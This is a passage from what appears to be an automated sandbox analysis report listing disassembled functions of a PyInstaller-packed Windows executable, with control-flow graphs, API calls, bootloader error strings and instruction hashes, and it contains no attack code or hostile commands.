                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_7ff69f3e0000_7405.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FileModuleName
                                                                                                                                                                                                                                                    • String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$ERROR: failed to remove temporary directory: %s$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$MEI$PYINSTALLER_STRICT_UNPACK_MODE$Path exceeds PYI_PATH_MAX limit.$WARNING: failed to remove temporary directory: %s$_MEIPASS2$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-runtime-tmpdir
                                                                                                                                                                                                                                                    • API String ID: 514040917-585287483
                                                                                                                                                                                                                                                    • Opcode ID: c0b2594e386a0b9d0a179b47a069e5e77d49092aa87a245718b77c1e1c92fd5a
                                                                                                                                                                                                                                                    • Instruction ID: d67c92372b211ab9e1eb9b5d42cdb38c5be6adf0d5342991c3c9c567cf20ab3e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c0b2594e386a0b9d0a179b47a069e5e77d49092aa87a245718b77c1e1c92fd5a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 96F1AF21B0868292FB38DB21D5543F96761EF54780F8640B9DA5DCB2D7EF6CE968C380
                                                                                                                                                                                                                                                    Function 00007FF69F405C74 Relevance: 13.8, APIs: 9, Instructions: 276fileCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 335 7ff69f405c74-7ff69f405ce7 call 7ff69f4059a8 338 7ff69f405d01-7ff69f405d0b call 7ff69f3f7830 335->338 339 7ff69f405ce9-7ff69f405cf2 call 7ff69f3f43d4 335->339 345 7ff69f405d0d-7ff69f405d24 call 7ff69f3f43d4 call 7ff69f3f43f4 338->345 346 7ff69f405d26-7ff69f405d8f CreateFileW 338->346 344 7ff69f405cf5-7ff69f405cfc call 7ff69f3f43f4 339->344 362 7ff69f406042-7ff69f406062 344->362 345->344 348 7ff69f405d91-7ff69f405d97 346->348 349 7ff69f405e0c-7ff69f405e17 GetFileType 346->349 352 7ff69f405dd9-7ff69f405e07 GetLastError call 7ff69f3f4368 348->352 353 7ff69f405d99-7ff69f405d9d 348->353 355 7ff69f405e6a-7ff69f405e71 349->355 356 7ff69f405e19-7ff69f405e54 GetLastError call 7ff69f3f4368 CloseHandle 349->356 352->344 353->352 360 7ff69f405d9f-7ff69f405dd7 CreateFileW 353->360 358 7ff69f405e73-7ff69f405e77 355->358 359 7ff69f405e79-7ff69f405e7c 355->359 356->344 370 7ff69f405e5a-7ff69f405e65 call 7ff69f3f43f4 356->370 365 7ff69f405e82-7ff69f405ed7 call 7ff69f3f7748 358->365 359->365 366 7ff69f405e7e 359->366 360->349 360->352 374 7ff69f405ed9-7ff69f405ee5 call 7ff69f405bb0 365->374 375 7ff69f405ef6-7ff69f405f27 call 7ff69f405728 365->375 366->365 370->344 374->375 382 7ff69f405ee7 374->382 380 7ff69f405f2d-7ff69f405f6f 375->380 381 7ff69f405f29-7ff69f405f2b 375->381 384 7ff69f405f91-7ff69f405f9c 380->384 385 7ff69f405f71-7ff69f405f75 380->385 383 7ff69f405ee9-7ff69f405ef1 call 7ff69f3f9dd0 381->383 382->383 383->362 387 7ff69f405fa2-7ff69f405fa6 384->387 388 7ff69f406040 384->388 385->384 386 7ff69f405f77-7ff69f405f8c 385->386 386->384 387->388 390 7ff69f405fac-7ff69f405ff1 CloseHandle CreateFileW 387->390 388->362 392 7ff69f405ff3-7ff69f406021 GetLastError call 7ff69f3f4368 call 7ff69f3f7970 390->392 393 7ff69f406026-7ff69f40603b 390->393 392->393 393->388
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000011.00000002.2078570167.00007FF69F3E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF69F3E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078539329.00007FF69F3E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078609505.00007FF69F40B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F41E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078698878.00007FF69F426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_7ff69f3e0000_7405.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1617910340-0
                                                                                                                                                                                                                                                    • Opcode ID: a69f399e4b06a5e248c6b703f60b2f721b94672e004abf856287656fc91ee5b6
                                                                                                                                                                                                                                                    • Instruction ID: 95c79492d3348c79c3d25435a03a81efeedb92ebdc8a46b934ee95b5c653d349
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a69f399e4b06a5e248c6b703f60b2f721b94672e004abf856287656fc91ee5b6
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 58C1D332B28A4286EB60CF69C4806AC3761FB59B98B161275DF2EDB796CF7CD451C340
                                                                                                                                                                                                                                                    Function 00007FF69F3E79B0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89fileCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • FindFirstFileW.KERNELBASE(?,00007FF69F3E7EF9,00007FF69F3E39E6), ref: 00007FF69F3E7A1B
                                                                                                                                                                                                                                                    • RemoveDirectoryW.KERNEL32(?,00007FF69F3E7EF9,00007FF69F3E39E6), ref: 00007FF69F3E7A9E
                                                                                                                                                                                                                                                    • DeleteFileW.KERNELBASE(?,00007FF69F3E7EF9,00007FF69F3E39E6), ref: 00007FF69F3E7ABD
                                                                                                                                                                                                                                                    • FindNextFileW.KERNELBASE(?,00007FF69F3E7EF9,00007FF69F3E39E6), ref: 00007FF69F3E7ACB
                                                                                                                                                                                                                                                    • FindClose.KERNEL32(?,00007FF69F3E7EF9,00007FF69F3E39E6), ref: 00007FF69F3E7ADC
                                                                                                                                                                                                                                                    • RemoveDirectoryW.KERNELBASE(?,00007FF69F3E7EF9,00007FF69F3E39E6), ref: 00007FF69F3E7AE5
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000011.00000002.2078570167.00007FF69F3E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF69F3E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078539329.00007FF69F3E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078609505.00007FF69F40B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F41E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078698878.00007FF69F426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_7ff69f3e0000_7405.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
                                                                                                                                                                                                                                                    • String ID: %s\*
                                                                                                                                                                                                                                                    • API String ID: 1057558799-766152087
                                                                                                                                                                                                                                                    • Opcode ID: 37c75c647de740c4d03e434983ba542f23ef98c0d39288f6f50529afbb256bed
                                                                                                                                                                                                                                                    • Instruction ID: cff04eee1b63aecb225cd83b9b2f47542c5e2b425c2534022ce4aed3b3bea9ca
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 37c75c647de740c4d03e434983ba542f23ef98c0d39288f6f50529afbb256bed
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9E419321B0C94292EB309B24E4485B96360FF94B94F460676D9BDCB7C5DF7CDA4AC780
                                                                                                                                                                                                                                                    Function 00007FF69F3E85A0 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000011.00000002.2078570167.00007FF69F3E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF69F3E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078539329.00007FF69F3E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078609505.00007FF69F40B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F41E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078698878.00007FF69F426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_7ff69f3e0000_7405.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2295610775-0
                                                                                                                                                                                                                                                    • Opcode ID: ca66ee6ee850f25a53d0c9653a43f1313d0231bc46844eb151e3c2d0b1a3e355
                                                                                                                                                                                                                                                    • Instruction ID: e67e538c3446e0a0c4f8dc36df9c396856ac94097e14d1ae94005d489783d2e0
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ca66ee6ee850f25a53d0c9653a43f1313d0231bc46844eb151e3c2d0b1a3e355
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F6F0C222A1868287F7B08B60B48837673A0EF84768F050339DA6D866D4CF7CE4688B04
                                                                                                                                                                                                                                                    Function 00007FF69F3FFBD8 Relevance: 2.0, APIs: 1, Instructions: 461COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000011.00000002.2078570167.00007FF69F3E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF69F3E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078539329.00007FF69F3E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078609505.00007FF69F40B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F41E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078698878.00007FF69F426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_7ff69f3e0000_7405.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CurrentFeaturePresentProcessProcessor
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1010374628-0
                                                                                                                                                                                                                                                    • Opcode ID: 635691222d115479c28cfb2a7c5460ed6ba239ea5ddb69637bfcc6e4d3ccf923
                                                                                                                                                                                                                                                    • Instruction ID: 5e9ef64ddac013dfe6494db2ba3d6845347cefc670a61ca9e1cb756153ada18c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 635691222d115479c28cfb2a7c5460ed6ba239ea5ddb69637bfcc6e4d3ccf923
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7102E421A1E64341FBB4AB25A8002B92790EF51FA0F1B46BDDD6DCA3D7DE7DE4019380
                                                                                                                                                                                                                                                    Function 00007FF69F3E18F0 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 172COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 179 7ff69f3e18f0-7ff69f3e192b call 7ff69f3e3f70 182 7ff69f3e1bc1-7ff69f3e1be5 call 7ff69f3eb870 179->182 183 7ff69f3e1931-7ff69f3e1971 call 7ff69f3e76a0 179->183 188 7ff69f3e1bae-7ff69f3e1bb1 call 7ff69f3ef36c 183->188 189 7ff69f3e1977-7ff69f3e1987 call 7ff69f3ef9f4 183->189 192 7ff69f3e1bb6-7ff69f3e1bbe 188->192 194 7ff69f3e19a1-7ff69f3e19bd call 7ff69f3ef6bc 189->194 195 7ff69f3e1989-7ff69f3e199c call 7ff69f3e2760 189->195 192->182 200 7ff69f3e19bf-7ff69f3e19d2 call 7ff69f3e2760 194->200 201 7ff69f3e19d7-7ff69f3e19ec call 7ff69f3f4154 194->201 195->188 200->188 206 7ff69f3e19ee-7ff69f3e1a01 call 7ff69f3e2760 201->206 207 7ff69f3e1a06-7ff69f3e1a87 call 7ff69f3e1bf0 * 2 call 7ff69f3ef9f4 201->207 206->188 215 7ff69f3e1a8c-7ff69f3e1a9f call 7ff69f3f4170 207->215 218 7ff69f3e1aa1-7ff69f3e1ab4 call 7ff69f3e2760 215->218 219 7ff69f3e1ab9-7ff69f3e1ad2 call 7ff69f3ef6bc 215->219 218->188 224 7ff69f3e1ad4-7ff69f3e1ae7 call 7ff69f3e2760 219->224 225 7ff69f3e1aec-7ff69f3e1b08 call 7ff69f3ef430 219->225 224->188 230 7ff69f3e1b1b-7ff69f3e1b29 225->230 231 7ff69f3e1b0a-7ff69f3e1b16 call 7ff69f3e25f0 225->231 230->188 233 7ff69f3e1b2f-7ff69f3e1b3e 230->233 231->188 235 7ff69f3e1b40-7ff69f3e1b46 233->235 236 7ff69f3e1b60-7ff69f3e1b6f 235->236 237 7ff69f3e1b48-7ff69f3e1b55 235->237 236->236 238 7ff69f3e1b71-7ff69f3e1b7a 236->238 237->238 239 7ff69f3e1b8f 238->239 240 7ff69f3e1b7c-7ff69f3e1b7f 238->240 241 7ff69f3e1b91-7ff69f3e1bac 239->241 240->239 242 7ff69f3e1b81-7ff69f3e1b84 240->242 241->188 241->235 242->239 243 7ff69f3e1b86-7ff69f3e1b89 242->243 243->239 244 7ff69f3e1b8b-7ff69f3e1b8d 243->244 244->241
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000011.00000002.2078570167.00007FF69F3E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF69F3E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078539329.00007FF69F3E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078609505.00007FF69F40B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F41E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078698878.00007FF69F426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_7ff69f3e0000_7405.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _fread_nolock$Message
                                                                                                                                                                                                                                                    • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                                                                                                                                                                                                                    • API String ID: 677216364-3497178890
                                                                                                                                                                                                                                                    • Opcode ID: 493bb61fc539ec1b122e5882e05326b97e853fd3b6a6c00663431bf0fa1fa3e3
                                                                                                                                                                                                                                                    • Instruction ID: 4cb4f75253b6175fbfa9db465d4b5f2684cbbf00d6dba56c66a1576b5a6a6ef8
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 493bb61fc539ec1b122e5882e05326b97e853fd3b6a6c00663431bf0fa1fa3e3
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A9719131B1868786EB70DB25D4506F93390EF48B84F465079E98DCB79AEF6CE9448B80
                                                                                                                                                                                                                                                    Function 00007FF69F3E15C0 Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 137COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 245 7ff69f3e15c0-7ff69f3e15d1 246 7ff69f3e15d3-7ff69f3e15dc call 7ff69f3e1050 245->246 247 7ff69f3e15f7-7ff69f3e1611 call 7ff69f3e3f70 245->247 252 7ff69f3e15ee-7ff69f3e15f6 246->252 253 7ff69f3e15de-7ff69f3e15e9 call 7ff69f3e25f0 246->253 254 7ff69f3e1613-7ff69f3e163a call 7ff69f3e2760 247->254 255 7ff69f3e163b-7ff69f3e1655 call 7ff69f3e3f70 247->255 253->252 261 7ff69f3e1671-7ff69f3e1688 call 7ff69f3ef9f4 255->261 262 7ff69f3e1657-7ff69f3e166c call 7ff69f3e25f0 255->262 268 7ff69f3e16ab-7ff69f3e16af 261->268 269 7ff69f3e168a-7ff69f3e16a6 call 7ff69f3e2760 261->269 267 7ff69f3e17c5-7ff69f3e17c8 call 7ff69f3ef36c 262->267 274 7ff69f3e17cd-7ff69f3e17df 267->274 272 7ff69f3e16b1-7ff69f3e16bd call 7ff69f3e11f0 268->272 273 7ff69f3e16c9-7ff69f3e16e9 call 7ff69f3f4170 268->273 280 7ff69f3e17bd-7ff69f3e17c0 call 7ff69f3ef36c 269->280 278 7ff69f3e16c2-7ff69f3e16c4 272->278 281 7ff69f3e16eb-7ff69f3e1707 call 7ff69f3e2760 273->281 282 7ff69f3e170c-7ff69f3e1717 273->282 278->280 280->267 290 7ff69f3e17b3-7ff69f3e17b8 281->290 285 7ff69f3e171d-7ff69f3e1726 282->285 286 7ff69f3e17a6-7ff69f3e17ae call 7ff69f3f415c 282->286 289 7ff69f3e1730-7ff69f3e1752 call 7ff69f3ef6bc 285->289 286->290 294 7ff69f3e1785-7ff69f3e178c 289->294 295 7ff69f3e1754-7ff69f3e176c call 7ff69f3efdfc 289->295 290->280 296 7ff69f3e1793-7ff69f3e179c call 7ff69f3e2760 294->296 300 7ff69f3e1775-7ff69f3e1783 295->300 301 7ff69f3e176e-7ff69f3e1771 295->301 304 7ff69f3e17a1 296->304 300->296 301->289 303 7ff69f3e1773 301->303 303->304 304->286
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000011.00000002.2078570167.00007FF69F3E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF69F3E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078539329.00007FF69F3E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078609505.00007FF69F40B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F41E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078698878.00007FF69F426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_7ff69f3e0000_7405.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Message
                                                                                                                                                                                                                                                    • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                                                                                                                                                                                                                    • API String ID: 2030045667-1550345328
                                                                                                                                                                                                                                                    • Opcode ID: 5146ab100ef6ae8108d921daeb6090ca94fb08b852174b9af5e6d18222b17732
                                                                                                                                                                                                                                                    • Instruction ID: d498df68a93c3d73080e0435e43db37e3fcbfbe1dc5c8815b6ce0a0928f0160b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5146ab100ef6ae8108d921daeb6090ca94fb08b852174b9af5e6d18222b17732
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A051C261B0864393EB30AB25D9005B92360FF54B94F4641B9ED1CCB7E6EFBCE9548380
                                                                                                                                                                                                                                                    Function 00007FF69F3E7FC0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 89processsynchronizationCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000011.00000002.2078570167.00007FF69F3E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF69F3E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078539329.00007FF69F3E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078609505.00007FF69F40B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F41E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078698878.00007FF69F426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_7ff69f3e0000_7405.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Process_invalid_parameter_noinfo$ByteCharCodeCommandConsoleCreateCtrlExitHandlerInfoLineMultiObjectSingleStartupWaitWide
                                                                                                                                                                                                                                                    • String ID: CreateProcessW$Failed to create child process!
                                                                                                                                                                                                                                                    • API String ID: 2895956056-699529898
                                                                                                                                                                                                                                                    • Opcode ID: 2d8580ce5d81a01d0f8683f73fef31206a84e7faf833a053d17f215ed92b6c27
                                                                                                                                                                                                                                                    • Instruction ID: 1c213e0cf7c1e2ad63b23f410039c0ae961ec2296dec769b7d8657fd5c3a969d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2d8580ce5d81a01d0f8683f73fef31206a84e7faf833a053d17f215ed92b6c27
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 12415131A0878282EB309B24F4452AE73A1FF98764F550379E6AD8B7D5DF7CD4548B40
                                                                                                                                                                                                                                                    Function 00007FF69F3E11F0 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 154COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 398 7ff69f3e11f0-7ff69f3e124d call 7ff69f3eb0a0 401 7ff69f3e124f-7ff69f3e1276 call 7ff69f3e25f0 398->401 402 7ff69f3e1277-7ff69f3e128f call 7ff69f3f4170 398->402 407 7ff69f3e1291-7ff69f3e12a8 call 7ff69f3e2760 402->407 408 7ff69f3e12ad-7ff69f3e12bd call 7ff69f3f4170 402->408 415 7ff69f3e1409-7ff69f3e141e call 7ff69f3ead80 call 7ff69f3f415c * 2 407->415 413 7ff69f3e12bf-7ff69f3e12d6 call 7ff69f3e2760 408->413 414 7ff69f3e12db-7ff69f3e12ed 408->414 413->415 417 7ff69f3e12f0-7ff69f3e1315 call 7ff69f3ef6bc 414->417 430 7ff69f3e1423-7ff69f3e143d 415->430 424 7ff69f3e1401 417->424 425 7ff69f3e131b-7ff69f3e1325 call 7ff69f3ef430 417->425 424->415 425->424 431 7ff69f3e132b-7ff69f3e1337 425->431 432 7ff69f3e1340-7ff69f3e1368 call 7ff69f3e94e0 431->432 435 7ff69f3e136a-7ff69f3e136d 432->435 436 7ff69f3e13e6-7ff69f3e13fc call 7ff69f3e25f0 432->436 437 7ff69f3e136f-7ff69f3e1379 435->437 438 7ff69f3e13e1 435->438 436->424 440 7ff69f3e13a4-7ff69f3e13a7 437->440 441 7ff69f3e137b-7ff69f3e1389 call 7ff69f3efdfc 437->441 438->436 443 7ff69f3e13ba-7ff69f3e13bf 440->443 444 7ff69f3e13a9-7ff69f3e13b7 call 7ff69f409140 440->444 445 7ff69f3e138e-7ff69f3e1391 441->445 443->432 447 7ff69f3e13c5-7ff69f3e13c8 443->447 444->443 448 7ff69f3e1393-7ff69f3e139d call 7ff69f3ef430 445->448 449 7ff69f3e139f-7ff69f3e13a2 445->449 451 7ff69f3e13ca-7ff69f3e13cd 447->451 452 7ff69f3e13dc-7ff69f3e13df 447->452 448->443 448->449 449->436 451->436 453 7ff69f3e13cf-7ff69f3e13d7 451->453 452->424 453->417
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000011.00000002.2078570167.00007FF69F3E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF69F3E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078539329.00007FF69F3E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078609505.00007FF69F40B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F41E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078698878.00007FF69F426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_7ff69f3e0000_7405.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Message
                                                                                                                                                                                                                                                    • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                                                                                                                    • API String ID: 2030045667-2813020118
                                                                                                                                                                                                                                                    • Opcode ID: 037f3093d73a47c1094b0f469115e0436c81e2300c38a90b229c8b60b32e4b09
                                                                                                                                                                                                                                                    • Instruction ID: c343d0515cb4132e860e4b60066fa7909bdf6ab175e64f7a196673660b205d9e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 037f3093d73a47c1094b0f469115e0436c81e2300c38a90b229c8b60b32e4b09
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6F511922A0864282EB70AB16E8403BA6351FF94794F590179ED4DCB7D6EF3CED05C780
                                                                                                                                                                                                                                                    Function 00007FF69F3FE020 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
